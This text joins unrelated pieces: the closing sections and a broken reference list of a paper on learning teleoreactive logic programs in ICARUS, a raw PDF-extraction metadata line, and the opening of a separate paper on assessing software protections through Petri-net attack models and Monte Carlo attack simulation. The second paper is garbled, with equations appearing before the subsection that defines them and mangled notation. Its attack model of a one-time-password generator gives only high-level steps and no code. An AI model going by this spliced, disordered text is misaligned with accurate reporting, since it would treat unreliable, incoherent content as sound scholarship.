total total cycles, even though the execution cycles increase slightly. The latter occurs because the vehicle happens to be moving in the right direction at the outset, which accidently brings it closer to the goal while the system is engaged in problem solving. After learning, the agent takes the same actions intentionally, which produces the increase in execution cycles. We should note that this task is dominated by driving time, which places a lower bound on the benefits of learning even when behavior becomes fully automatized. Table 9: Recursive skill clauses learned for the in-city driving domain. We also inspected the skills that the architecture learned for this domain. Table 9 shows the five clauses it acquires by the end of a typical training run. These structures include two recursive references, one in which in-intersection-for-right-turn invokes itself directly, but also a more interesting one in which driving-in-segment calls itself indirectly through in-segment, in-intersection-for-right-turn, and in-rightmost-lane. Testing this teleoactive logic program on streets with more lanes than occur in the training task suggests that it generalizes correctly to these situations. 6. Related Research The basic framework we have reported in this paper incorporates ideas from a number of traditions. Our representation and organization of knowledge draws directly from the paradigm of logic programming (Clocksin & Mellish, 1981), whereas its utilization in a recognize-act cycle has more in common with production-system architectures (Neches, Langley, & Klahr, 1987). The reliance on heuristic search to resolve goal-driven impasses, coupled with the caching of generalized solutions, comes closest to the performance and learning methods used in problem-solving architectures like Soar (Laird, Rosenbloom, & Newell, 1986) and PRODIGY (Minton, 1990). Finally, we have already noted our debt to Nilsson (1994) for the notion of a teleoactive system. However, our approach differs from earlier methods for improving the efficiency of problem solvers in the nature of the acquired knowledge. In contrast to Soar and PRODIGY, which create flat control rules, our framework constructs hierarchical logic programs that incorporate nonterminal symbols. Methods for learning macro-operators (e.g., Iba, 1988; Mooney, 1989) have a similar flavor, in that they explicitly specify the order in which to apply operators, but they do not typically support recursive references. Shavlik (1989) re- ports a system that learns recursive macro-operators but that, like other work in this area, does not acquire reactive controllers. Moreover, both traditions have used sophisticated analytical methods that rely on goal regression to collect conditions on control rules or macro-operators, nonincremental empir- ical techniques like inductive logic programming, or combinations of such methods (e.g., Estlin & Mooney, 1997). Instead, goal-driven composition transforms traces of successful means-ends search directly into teleoactive logic programs, determining their precondi- tions by a simple method that involves neither analysis or induction, as normally defined, and that operates in an incremental and cumulative fashion. Previous research on learning for reactive execution, like work on search control, has emphasized unstructured knowledge. For example, Benson's (1995) TRAIL acquires tele- reactive control programs for use in physical environments, but it utilizes inductive logic programming to determine local rules for individual actions rather than hierarchical struc- tures. Fern et al. (2004) report an approach to learning reactive controllers that trains itself on increasingly complex problems, but that also acquires decision lists for action selection. Khardon (1999) describes another method for learning ordered, but otherwise unstructured, control rules from observed problem solutions. Our approach shares some features with research on inductive programming, which focuses on synthesizing iterative or recursive programs from input-output examples. For instance, Schmid's (2005) IPAL generates an initial program from the results of problem solving by replacing constants with constructive expressions with variables, then transforms it into a recursive program through inductive inference steps. Olsson's (1995) ADATE also generates recursive programs through program refinement transformations, but carries out an iterative deepening search guided by criteria like fit to training examples and syntactic complexity. Schmid’s work comes closer to our own, in that both operate over problem- solving traces and generate recursive programs, but our method produces these structures directly, rather than using explicit transformation or revision steps. Perhaps the closest relative to our approach is Reddy and Tadepalli's (1997) X-Learn, which acquires goal-decomposition rules from a sequence of training problems. Their system does not include an execution engine, but it generates recursive hierarchical plans in a cumulative manner that also identifies declarative goals with the heads of learned clauses. However, because it invokes forward-chaining rather than backward-chaining search to solve new problems, it relies on the trainer to determine program structure. X-Learn also uses a sophisticated mixture of analytical and relational techniques to determine conditions, rather than our much simpler method. Ruby and Kibler's (1991) SteppingStone has a similar flavor, in that it learns generalized decompositions through a mixture of problem reduction and forward-chaining search. Marsella and Schmidt's (1993) system also acquires task-decomposition rules by combining forward and backward search to hypothesize state pairs, which in turn produce rules that it revises after further experience. Finally, we should mention another research paradigm that deals with speeding up the execution of logic programs. One example comes from Zelle and Mooney (1993), who report a system that combines ideas from explanation-based learning and inductive logic programming to infer the conditions under which clauses should be considered. Work in this area starts and ends with standard logic programs, whereas our system transforms a weak problem-solving method into an efficient program for reactive control. In summary, although our learning technique incorporates ideas from earlier frameworks, it remains distinct on a number of dimensions. 7. Directions for Future Research Despite the promise of this new approach to representing, utilizing, and learning knowledge for teleoactive control, our work remains in its early stages. Future research should demonstrate the acquisition of complex skills on additional domains. These should include both classical domains like logistics planning and dynamic settings like in-city driving. We have reported preliminary results on the latter, but our work in this domain to date has dealt with relatively simple skills, such as changing lanes and slowing down to park. Humans' driving knowledge is far more complex, and we should demonstrate that our methods are sufficient to acquire many more of them. Note that, although driving involves reactive control, it also benefits from route planning and other high-level activities. Recall that our definition of teleoactive logic programs, and our method for learning them, guarantees only that a skill will achieve its associated goal if it executes successfully, not that such execution is possible. For such guarantees, we must augment the current execution module with some lookahead ability, as Nau et al. (1999) have already done for hierarchical task networks. This will require additional effort from the agent, but still far less than solving a problem with means-ends analysis. Another response would use inductive logic programming or related methods to learn additional conditions on skill clauses that ensure they will achieve their goal, even without lookahead. To this end, we can transform the results of lookahead search into positive and negative instances of clauses, based on whether they would lead to success, much as in early work on inducing search-control rules from solution paths (Sleeman et al., 1982). Even if such conditions are incomplete, they should still reduce the planning effort required to ensure the agent's actions will produce the desired outcome. Another important limitation concerns our assumption that the agent always executes a skill to achieve a desired situation. The ability to express less goal-directed activities, such as playing a piano piece, are precisely what distinguishes hierarchical task networks from classical planning (Erol, Henderl, & Nau, 1994). We hope to extend our framework in this direction by generalizing its notion of goals to include concepts that describe sets of situations that hold during certain time intervals. To support the hierarchical skill acquisition, this augmented representation will require extensions to both the problem solving and learning mechanisms. In addition, we should extend our framework to handle skill learning in nonserializable domains, such as tile-sliding puzzles, which motivated much of the early research on macro-operator formation (e.g., Iba, 1988). Future work should also address a related form of overgeneralization we have observed on the Tower of Hanoi puzzle. In this domain, the approach learns reasonable hierarchical skills that can solve the task without problem solving, but that only do so about half the time. In other runs, the learned skills attempt to move the smallest disk to the wrong peg, which ultimately causes the system to fail. Humans often make similar errors but also learn to avoid them with experience. Inspection of the behavioral trace suggests this happens because one learned skill clause includes variables that are not mentioned in the head but are bound in the body. We believe that including contextual conditions about variables bound higher in the skill hierarchy will remove this nondeterminism and produce more correct behavior. In addition, recall that the current system does not chain backward from the start condition of learned skill clauses. We believe that cases will arise in which such chaining, even if not strictly necessary, will make the acquisition of complex skills much easier. Extending the problem solver to support this ability means defining new conceptual predicates that the agent can use to characterize situations in which its learned skills are applicable. This will be straightforward for some domains and tasks, but some recursive skills will need recursively defined start concepts, which requires a new learning mechanism. Augmenting the system in this manner may also lead to a utility problem (Minton, 1990), not during execution of learned telereactive logic programs but during the problem solving used for their acquisition, which we would then need to overcome. Finally, we should note that, although our approach learns recursive logic programs that generalize to different numbers of objects, its treatment of goals is less flexible. For example, it can acquire a general program for clearing a block that does not depend on the number of other objects involved, but it cannot learn a program for constructing a tower with arbitrarily specified components. Extending the system's ability to transfer across different goals, including ones that are defined recursively, is another important direction for future research on learning hierarchical skills. 8. Concluding Remarks In the preceding pages, we proposed a new representation of knowledge—telereactive logic programs—and described how they can be executed over time to control physical agents. In addition, we explained how a means-ends problem solver can use them to solve novel tasks and, more important, transform the traces of problem solutions into new clauses that can be executed efficiently. The responsible learning method—goal-driven composition—acquires recursive, executable skills in an incremental and cumulative manner. We reported experiments that demonstrated the method's ability to acquire hierarchical and recursive skills for three domains, along with its capacity to transfer its learned structures to tasks with more objects than seen during training. Telereactive logic programs incorporate ideas from a number of traditions, including logic programming, adaptive control, and hierarchical task networks, in a manner that supports reactive but goal-directed behavior. The approach which we have described for acquiring such programs, and which we have incorporated into the I CARUS architecture, borrows intuitions from earlier work on learning through problem solving, but its details rely on a new mechanism that bears little resemblance to previous techniques. Our work on learning teleoreactive logic programs is still in its early stages, but it appears to pro- vide a novel and promising path to the acquisition of effective control systems through a combination of reasoning and experience. Acknowledgements This material is based on research sponsored by DARPA under agreement numbers HR0011- 04-1-0008 and FA8750-05-2-0283 and by Grant IIS-0335353 from the National Science Fo- dation. The U. S. Government is authorized to reproduce and distribute reprints for Govern- mental purposes notwithstanding any copyright notation thereon. Discussions with Nima Asgharbeigy, Kirstin Cummings, Glenn Iba, Negin Nejati, David Nicholas, Seth Rogers, and Stephanie Sage contributed to the ideas we have presented in this paper. References International Conference on Machine Learning (pp. 47–54). San Francisco: Morgan Kaufmann. persistent reactive behavior. Proceedings of the Third International Joint Conference on Proceedings of the Fifteenth International Conference on Inductive Logic Programming (pp. 51–68). Bonn, Germany: Springer. Verlag. Proceedings of the Twelfth National Conference on Artificial Intelligence (pp. 1123–1128). Seattle: MIT Press. of planning. Proceedings of the Fifteenth International Joint Conference on Artificial Intelligence (pp. 1227–1232). Nagoya, Japan. Fern, A., Yoon, S. W., & Givan, R. (2004). Learning domain-specific control knowledge from random walks. Proceedings of the Fourteenth International Conference on Automated solving. Computational Intelligence. Khardon, R. (1999). Learning action strategies for planning domains. Artificial Intelligence, 113, 125–148. a general learning mechanism. Machine Learning, 1, 11–46.
{"Source-Url": "http://www.isle.org/~langley/papers/icarus.jmlr06.pdf", "len_cl100k_base": 14303, "olmocr-version": "0.1.53", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 148119, "total-output-tokens": 18494, "length": "2e13", "weborganizer": {"__label__adult": 0.0005359649658203125, "__label__art_design": 0.0012302398681640625, "__label__crime_law": 0.0005116462707519531, "__label__education_jobs": 0.01238250732421875, "__label__entertainment": 0.00023877620697021484, "__label__fashion_beauty": 0.0003349781036376953, "__label__finance_business": 0.0006051063537597656, "__label__food_dining": 0.0005540847778320312, "__label__games": 0.0021076202392578125, "__label__hardware": 0.00160980224609375, "__label__health": 0.0006966590881347656, "__label__history": 0.0006880760192871094, "__label__home_hobbies": 0.0003941059112548828, "__label__industrial": 0.0010118484497070312, "__label__literature": 0.0010595321655273438, "__label__politics": 0.0004253387451171875, "__label__religion": 0.0006933212280273438, "__label__science_tech": 0.2486572265625, "__label__social_life": 0.00023853778839111328, "__label__software": 0.015655517578125, "__label__software_dev": 0.70849609375, "__label__sports_fitness": 0.0004391670227050781, "__label__transportation": 0.0013570785522460938, "__label__travel": 0.0003039836883544922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 78008, 0.02462]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 78008, 0.76452]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 78008, 0.92579]], "google_gemma-3-12b-it_contains_pii": [[0, 2725, false], [2725, 6247, null], [6247, 8526, null], [8526, 10828, null], [10828, 13996, null], [13996, 18107, null], [18107, 20284, null], [20284, 23569, null], [23569, 26821, null], [26821, 28910, null], [28910, 32702, null], [32702, 36563, null], [36563, 38869, null], [38869, 41995, null], [41995, 45194, null], [45194, 48719, null], [48719, 50826, null], [50826, 53900, null], [53900, 55922, null], [55922, 58483, null], [58483, 60784, null], [60784, 64627, null], [64627, 68279, null], [68279, 71837, null], [71837, 74754, null], [74754, 78008, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2725, true], [2725, 6247, null], [6247, 8526, null], [8526, 10828, null], [10828, 13996, null], [13996, 18107, null], [18107, 20284, null], [20284, 23569, null], [23569, 26821, null], [26821, 28910, null], [28910, 32702, null], [32702, 36563, null], [36563, 38869, null], [38869, 41995, null], [41995, 45194, null], [45194, 48719, null], [48719, 50826, null], [50826, 53900, null], [53900, 55922, null], [55922, 58483, null], [58483, 60784, null], [60784, 64627, null], [64627, 68279, null], [68279, 71837, null], [71837, 74754, null], [74754, 78008, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 78008, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 78008, null]], "pdf_page_numbers": [[0, 2725, 1], [2725, 6247, 2], [6247, 8526, 3], [8526, 10828, 4], [10828, 13996, 5], [13996, 18107, 6], [18107, 20284, 7], [20284, 23569, 8], [23569, 26821, 9], [26821, 28910, 10], [28910, 32702, 11], [32702, 36563, 12], [36563, 38869, 13], [38869, 41995, 14], [41995, 45194, 15], [45194, 48719, 16], [48719, 50826, 17], [50826, 53900, 18], [53900, 55922, 19], [55922, 58483, 20], [58483, 60784, 21], [60784, 64627, 22], [64627, 68279, 23], [68279, 71837, 24], [71837, 74754, 25], [74754, 78008, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 78008, 0.20386]]}
olmocr_science_pdfs
2024-12-11
2024-12-11
2d0de0f491093923365338a184b8217949b760d8
Attack Simulation based Software Protection Assessment Method Gaofeng Zhang, Paolo Falcarin, Elena Gómez-Martinez, Shareeful Islam University of East London, London, UK {g.zhang, falcarin, e.gomez, s.islam}@uel.ac.uk Christophe Tartary Saarland University, Saarbrücken, Germany christophe_tartary@icloud.com Bjorn De Sutter Ghent University, Ghent, Belgium bjorn.desutter@ugent.be Jérôme d’Annoville Gemalto, Meudon, France jerome.d-annoville@gemalto.com Abstract—Software protection is an essential aspect of information security to withstand malicious activities on software, and protecting software assets. However, software developers still lack a methodology for the assessment of the deployed protections. To solve these issues, we present a novel attack simulation based software protection assessment method to assess and compare various protection solutions. Our solution relies on Petri Nets to specify and visualize attack models, and we developed a Monte Carlo based approach to simulate attacking processes and to deal with uncertainty. Then, based on this simulation and estimation, a novel protection comparison model is proposed to compare different protection solutions. Lastly, our attack simulation based software protection assessment method is presented. We illustrate our method by means of a software protection assessment process to demonstrate that our approach can provide a suitable software protection assessment for developers and software companies. Keywords—Software Security; Software Protection Assessment; Attack Simulation; Monte Carlo Method; Petri Net I. INTRODUCTION Currently, software is an extremely important asset for customers to support and execute their businesses. Consequently, software protection has attracted much attention from developers and software companies in terms of software security. To ensure security against malicious software attacks, many tools have been developed, such as data obfuscation, tamper-proofing, code splitting, software watermarking, and others [13]. In this regard, assessing the effectiveness of these protections is crucial before embedding them into real commercial products. In particular, in practical use cases, like mobile computing, multiple protection methods could be utilised together as Protection Solutions (PSs) to thwart actual threats. Therefore, a software protection assessment method needs to be able to assess potential PSs with respect to various types of attacks. This is the context where this paper takes place. Currently, one main type of software protection assessment [15] focuses on the assessment of individual protection methods and does not consider PSs with multiple protection methods. Another kind of software protection assessment [14] discussed general software measurement frameworks for protection, and did not involve PSs either. Hence, none of these two approaches is suitable for protection assessment in terms of complicated PSs to provide convincing results. Besides, for real software attack processes, uncertainty is another challenge for these existing assessment methods. In uncertain software attacking processes, there are many random variables and factors at play, such as the computing resources for attacking, the decisions or selections made by specific attackers, and so on. Moreover, specific environments, like mobile computing, could jeopardise this uncertainty by the fragmentation of mobile OS. To capture this phenomenon, we could use a non-deterministic attack simulation based on the Monte Carlo method to describe the real uncertain software attacking processes. This idea will be the basic tool for our proposed method. Petri Net (PN) based attack models are suitable objects to model software attacks [8, 10], and in this work we use them to support software protection assessment in terms of Monte Carlo based attack simulation. In real software protection implementations, assessing every possible PSs in each specific software protection situation is a huge task, considering the myriad of possible combinations of various PSs (multiple protection methods with their parameters) and various software protection situations (multiple attacks with weights). Hence, the relations (comparing results) among PSs under protection assessments are particularly valuable for this. Our assessment method can use a comparison model to manage the comparisons among PSs on the basis of the attack simulation. As such, the protection comparison model is the central component of our assessment methodology. To summarize our approach, our novel Attack Simulation based Software Protection Assessment Method (ASSPAM) uses a Monte Carlo based Attack Simulation (MCAS) to simulate specific software attack processes with implementing PSs, based on PN based attack models. Then, using the results obtained from the MCAS, our Attack Simulation based Protection Comparison Model (ASPCM) provides a numeric estimation of the PS and thus this can be compared in the ASSPAM to search for the best PS. The main contributions of this paper includes: 1) a Monte Carlo based attack simulation for protection assessment; 2) a novel attack simulation based protection comparison model to compare PSs with numeric confidences; 3) a novel attack simulation based software protection assessment method to run the assessment. This research has been carried out within the European FP7 project ASPIRE, Advanced Software Protection: Integration, Research, and Exploitation [1]. Our method focuses on the assessment of PSs, and does not cover the generation and optimisation of these PSs. Some other components of ASPIRE store security experts’ knowledge and experiences in the Knowledge Base, and generates PSs by means of reasoning technique. Besides, to generate and optimise PSs, there are some aspects, such as the cost of protections, the dependency among protection methods, and so on, which are out of the scope of this paper. Furthermore, compared to traditional PNs [8], our PN based attack models focus on attack steps (transitions) with related simulation information. Therefore, some features in traditional \textit{PNs} are not involved in this paper, such as tokens and liveness. \textit{PNs} with full characteristics will be utilised by other software protection assessment approaches in the \textit{ASPIRE} project. The paper is organized as follows. Section II describes related work. Section III discusses preliminary concepts and background. In Section IV, our new method is proposed. In Section V, we use a protection assessment instance to demonstrate that our proposed method can provide suitable protection assessments. Section VI concludes this paper and points out future work. II. RELATED WORK This section introduces existing research progress in the areas of software analysis and measurement, attack modelling, Monte Carlo simulation and software protection assessment. A. Software Analysis and Measurement Software analysis and measurement are important areas in software engineering [2]. For example, in the software process improvement area, measurement has been emphasised as a central function and activity [3]. From a software security viewpoint, Tonella et al. [4] presented a general framework to assess a software by various measurable features and metrics to withstand software attacks. Related software analysis and measurement mechanisms are valuable references for our software protection assessment. B. Attack Modelling Currently, attack modelling is an important area of information security. Attack Tree models and Attack Graphs are widely used for representing network attacks, virus attacks, and so on [5,6]. For example, the scalable modelling process is studied for attack graph generation with logic formalism in [7]. However, none of them can precisely describe preconditions, actions and external impacts in software attack processes properly. In this regard, Petri Nets (\textit{PNs}) were originally introduced as a modelling technique for concurrent systems [8]. These nets can model specific cyber-physical attacks on smart grid [9]. Taking software protection as objective, Wang et al. [10] focused on coloured \textit{PN} based attack modelling. As discussed in Section I, \textit{PN} based attack models are suitable to describe preconditions, post-conditions and actions and, therefore, they will play a core role in our attack modelling and protection assessment. C. Monte Carlo Simulation The Monte Carlo simulation (method) is a powerful tool for dealing with uncertainty and probability [11]. It is very useful for analysing and simulating complex systems and problems, due to its flexibility and error-quantifiable features [12]. Hence, the Monte Carlo method is a suitable technique to simulate complex systems in terms of multiple random variables. As discussed in Section I, in this paper, we assess various \textit{PSNs} in real uncertain attacking processes to provide suitable \textit{PSNs} for developers and software companies. With the help of the Monte Carlo method, we can use attack simulation to support the \textit{ASSPAM} when assess protections. D. Software Protection Assessment As previous discussed, software protection assessment is an essential part of software protection [13]. Basile et al. [14] described a unified high-level software attack model to assess software protections for developers. Experiments have been designed to assess the effectiveness and efficiency of related software protection techniques for code obfuscation [15] [18] [19]. Existing protection assessment methods are too specialised or too general to cope with uncertain software attack processes and \textit{PSNs}. That is why, to overcome this issue, our \textit{ASSPAM} will be relying on \textit{PN} based attack models and Monte Carlo based attack simulations. III. PETRI NET BASED ATTACK MODEL In this section, we discuss the \textit{PN} based attack model for attack simulation, which is the basic supporting tool of our \textit{ASSPAM}, especially for our \textit{MCAS}. A. Petri Net based Software Attack Modelling \textit{PN} based attack models are the essential rationale for our assessment method in this paper. Generally speaking, \textit{PN} based attack models represent all possible attack paths and attack steps in software attacks, and support the attack simulations on these attacks via some extra information. Based on existing work [8,10], we present our models to describe software attacks for protection assessment: Definition 1 \textit{PSAM}: A \textit{PN} based Software Attack Model for simulation is a five-tuple, \textit{PSAM} = (\textit{P}, \textit{T}, \textit{A}, \textit{EC}, \textit{AE}), where: - \textit{P} is a finite set of states, represented by circles. These states model sub-goals reached by an attacker after having executed a number of attack steps. \textit{P}=\{\textit{P}_0,\ldots,\textit{P}_n\}. - \textit{T} is a finite set of transitions, represented by rectangles. These transitions model attack steps, i.e., specific actions undertaken by attackers to reach a sub-goal on a path to the final end goal of their attack. \textit{T}=\{\textit{T}_0,\ldots,\textit{T}_m\}. - \textit{P} \cup \textit{T} \neq \emptyset, \textit{P} \cap \textit{T} = \emptyset. - \textit{A} \subseteq (\textit{T} \times \textit{P}) \cup (\textit{P} \times \textit{T}), is a multi-set of direct arcs, relating sub-goals and attack steps. \textit{A}=\{\textit{a}_{\textit{0}},\ldots,\textit{a}_{\textit{m}}\}. - \textit{EC} represents the Effort Consumption. It is a finite set of attacker’s effort consumed at each transition in \textit{T}, \textit{EC}=[\textit{ec}_{\textit{0}},\ldots,\textit{ec}_{\textit{n}}]. It is utilised as the preconditions. - \textit{AE} represents the Attacker Effort. It is a finite set of attacker’s effort at each state in \textit{P}, \textit{AE}=[\textit{ae}_{\textit{0}},\ldots,\textit{ae}_{\textit{n}}]. Attackers have the capability including resources and skills to execute attacks on protected or unprotected software. This “capability” is represented with \textit{AE} and will be “consumed” in transitions of attack processes via \textit{EC} in attack simulations. \textit{EC} and \textit{AE} will be discussed further in the next subsection, which are the key issues to support the attack simulations for protection assessment. As an example of a relevant use case, Figure 1 and Table 1 present relevant attack paths on a One-Time Password (\textit{OTP}) generator [16] by means of \textit{PSAM}: \textit{P}0 is the starting state in which attackers start to attack the \textit{OTP} software, and \textit{P}10 is the final state which means a successful attacking. Specially, this success means that attackers obtain the seed of the \textit{OTP} generator. \textit{P}1, \textit{P}2, \textit{P}3, \textit{P}4, \textit{P}5, \textit{P}6, \textit{P}7, \textit{P}8, and \textit{P}9 are nine intermediate states in the attack, corresponding to different sub-goals being reached. \textit{T}0, \textit{T}1, \textit{T}2, \textit{T}3, \textit{T}4, \textit{T}5, \textit{T}6, \textit{T}8, \textit{T}9, \textit{T}10, and \textit{T}11 are eleven transitions, which describe various attack steps (actions) in attack processes, detailed in Table 1. Table 1. Attack Table of PN based attack model on a one-time password generator <table> <thead> <tr> <th>Description/Objective</th> <th>Input</th> <th>Output</th> </tr> </thead> <tbody> <tr> <td>T0</td> <td>Identify PIN section of the code</td> <td>Original code</td> </tr> <tr> <td></td> <td></td> <td>Piece of code containing PIN checking</td> </tr> <tr> <td>T1</td> <td>Bypass PIN check</td> <td>Piece of code containing PIN checking</td> </tr> <tr> <td>T2</td> <td>Bypass PIN check</td> <td>Piece of code containing PIN checking</td> </tr> <tr> <td>T3</td> <td>Set-up for parallel run</td> <td>N/A</td> </tr> <tr> <td>T4</td> <td>Unlock provisioning phase</td> <td>Original code</td> </tr> <tr> <td>T5</td> <td>Fake server setting</td> <td>N/A</td> </tr> <tr> <td>T6</td> <td>AES decryption code identification</td> <td>Fake server (P5) + Reusable provisioning code (P6)</td> </tr> <tr> <td>T7</td> <td>Seed recovery</td> <td>AES decryption code + real server</td> </tr> <tr> <td>T8</td> <td>Code pruning for XOR localization</td> <td>Original code</td> </tr> <tr> <td>T9</td> <td>XOR chains identification</td> <td>Code fragments (P8)</td> </tr> <tr> <td>T10</td> <td>Seed recovery</td> <td>Sequence of XOR operations</td> </tr> </tbody> </table> PSAM is the basic supporting tool in this paper by providing attack models with attack paths and steps, and the part with AE and EC will be introduced further in the next subsection to complete the model. B. Effort Consumption and Attacker Effort In this subsection, we detail the Effort Consumption (EC) and the Attacker Effort (AE) as the part of the PSAM to support attack simulation for protection assessment particularly. In this paper, we use uniform distributions to describe Effort Consumption — EC and ec. For each ec, a Maximum boundary — Maxi and a Minimum boundary — Mini decide this random variable by the uniform distribution in equation (1). \[ EC = \{ec_0, \ldots, ec_i, \ldots, ec_m\}, ec_i = fec(Mini, Maxi), i \in [0, m] \quad (1) \] In equation (1), fec() represents the sampling process of the uniform distribution with two boundaries: Mini and Maxi. For example, T0 in the OTP attack model is to “Identify the PIN check portion of the code”. Both Maxi and Mini can be set in the attack modelling by users or security experts in industry, based on real attack data. After that, ec0 is the random variable with the uniform distribution and two boundaries: Max0 and Min0. Both boundaries can be increased due to the fact that some protections have been applied: for example, when some software protection methods increase the code size or the flow complexity, this can make the T0 attack step more difficult, which will change the uniform distribution for ec0 with Max0 and Min0. These methods could be specific PSs to change ec0. The relations between methods and transitions are decided by users, as well as existing knowledge. In other words, these Mini and Maxi (and EC) depend on various PSs. Another concept of PSAM is AE, which represents the current effort of the attacker in the state of this attack process. AE can be described by equation (2). In this equation, ae0 is the attacker effort before attack processes (in the initial place). In this paper, we set ae0 as a random variable with a normal distribution. \[ AE = \{ae_0, \ldots, ae_i, \ldots, ae_n\} \] As introduced in Section I, since the attacker is one key part of the simulation, we will use a normal distribution to represent real uncertain attacking processes for one attacker. Using a PSAM is the basis of our method in this paper, and the attack simulation, protection comparison model and protection assessment method rely on this. In the next section, we will introduce the main content in this paper — ASSPAM. IV. ATTACK SIMULATION BASED SOFTWARE PROTECTION ASSESSMENT METHOD Based on previous discussions, we will introduce our novel ASSPAM in three steps: firstly, a MCAS simulates attack processes with PSs, based on PN based attack models described in Section III; secondly, we will introduce our ASPCM to compare different PSs based on previous attack simulations; lastly, ASSPAM will be introduced based on MCAS and ASPCM to provide suitable PSs as the protection assessment results. A. Monte Carlo based Attack Simulation Monte Carlo based Attack Simulation (MCAS) includes two parts: the Single Attack Process Simulation (SAPS) and the Monte Carlo Method. They will be introduced in the following. 1) Single Attack Process Simulation The main process of Single Attack Process Simulation (SAPS) works as follows: in one PSAM (as a Directed Acyclic Graph), one attacker will try to move from the starting state to the final state. If he/she succeeds, the result of this SAPS is TRUE; otherwise, it is FALSE. It can be viewed as a route searching process in the directed acyclic graph. In SAPS, in each node, e.g. transition, we use the Passing Probability—PP to control the probability that the attacker completes this transition (attack step) and reach the next state. Passing Probability (PP): A finite set for each transition in T, and pp_i \in PP, i \in [0, m]. \[ pp_i = \begin{cases} 0, & ec_{CUR} < ec_i \\ \tanh{(ae_{CUR}/|ec_i| - 1)}, & ec_{CUR} \geq ec_i, i \in [0, m] \end{cases} \quad (3) \] In equation (3), ec comes from equation (1), which is the effort consumption for each attack step. And ec_{CUR} comes from equation (2), which is the current attacker effort in one attack simulation process. If ec_{CUR} is smaller than ec, the probability is zero, which means that the current attacker effort is too low to complete this attack step. Otherwise, if ec_{CUR} is not smaller than ec, the passing probability is required to be monotonically increasing and in the range of \([0, 1]\) when x is in \((0, +\infty)\). To match this, we use the hyperbolic tangent function: \[ \tanh(x) = (1 - e^{-2x})/(1 + e^{-2x}) \] Besides, after discussing the pre-conditions of transitions (PP), the actions of transitions will focus on the changing on AE and the current place. \[ ae_{NEW} = \begin{cases} ae_{CUR} - ec, & \text{on the probability of } (pp) \\ ae_{CUR}, & \text{on the probability of } (1 - pp) \end{cases} \] (4) In equation (4), for transition Ti, on the probability of pp, ae_{CUR} will be subtracted by ec, which means that the attacker passes this transition to arrive the next place after this transition. Otherwise (i.e., with probability 1 - pp), the attacker needs go back to the previous state to find other paths to reach the final state, and ae_{CUR} is still the same. Briefly, the SAPS is the basis to Monte Carlo based attack simulation for protection assessment by indicating attack processes on PSAM. 2) Monte Carlo based Attack Simulation Based on this SAPS model, we use the Monte Carlo method to manage the SAPS and to provide a randomized simulator emulating the attack processes success. The MCAS is illustrated in Figure 2. The key component is our SAPS. To run the SAPS, we need to perform an initialisation phase in order to build the underlying PN based attack model with EC and AE as introduced in Subsection III.B. The result of each SAPS is of type Boolean. Then, the Monte Carlo method executes the SAPS multiple times. Finally, the simulation provides a probability of attack success (the ratio of SAPSs with TRUE in all SAPSs). Besides, as introduced in Subsection III.B, specific PSs can decide specific ECs in PSAM. Hence, the result of one MCAS process is a probability of attack success on one PN based attack model and one PS. Therefore, the probability of these two events can be defined as \( p_1 \times p_2 + (1 - p_1) \times (1 - p_2) \), which is equation (6). As such, our two confidences are expressed by equations (5) and (6). For the assertion: PS-1 is better than PS-2, with confidences including: \[ CC = p_2 - p_1 \] (5) Neutral Confidence (NeuC): \[ NeuC = 1 + 2 \times p_1 \times p_2 - p_1 - p_2 \] (6) Based on results of MCAS—the probabilities of successful attack, the ASPCM consider the comparisons based on assertions (PS-1 is better than PS-2, or PS-2 is better than PS-1.) with using the corresponding confidence values. Therefore, based on MCAS, the ASPCM can generate assertions with numeric confidences as the comparison results of various PSs. These results can be utilised to generate the final protection assessment results of ASSPAM, which will be introduced in the next subsection. C. Attack Simulation based Software Protection Assessment Method In this subsection, we will introduce our novel Attack Simulation based Software Protection Assessment Method (ASSPAM), based on previous MCAS and ASPCM. ![Figure 2. Monte Carlo based Attack Simulation (MCAS)](image) In brief, MCAS is the basic tool of ASPCM and ASSPAM. B. Attack Simulation based Protection Comparison Model We now present our ASPCM. As indicated in Section I, the main target of ASPCM is to compare PSs with numeric confidences by means of MCAS. To reach this aim, we introduce two such values as Compare Confidence and Neutral Confidence. Based on Subsection IV.A, a probability of attack success is the result of one MCAS process with one PN based attack model and one PS. If we compare two Protection Solutions, for instance PS-1 and PS-2, we can assume that there are two probabilities: \( p_1 \) and \( p_2 \) representing the results of MCASs being executed based on PS-1 and PS-2 respectively. To describe the confidence of the comparison, it is an intuitive way to use the difference of these two probabilities, like \( p_1 - p_2 \), under the assertion: PS-1 is better than PS-2. Besides, to enhance the previous confidence, we consider the situation that these two PSs cannot be distinguished, which includes two kinds of events: an attacker can successfully break PS-2 while he/she is able to break PS-1; and an attacker cannot break PS-2 while he/she is unable to break PS-1. In **ASSPAM**, the main process is that users need to set the software protection situations firstly (selecting attack models from the “Attack Model Base”), including which attacks need to be considered and the weights on them. Then, the **ASPCM** can be triggered to select potential **PS**s (from the “**PS Knowledge Base**”) to be compared and assessed. These potential **PS**s can be executed by the **MCAS** for generating related probabilities of attacking successful. Based on these probabilities, the **ASPCM** can generate the comparison results between **PS**s with numeric confidences. In the last step, relying on these comparison outputs, users can use some specific rules (from the “Rules Set”) to select some suitable **PS**s as the final assessment 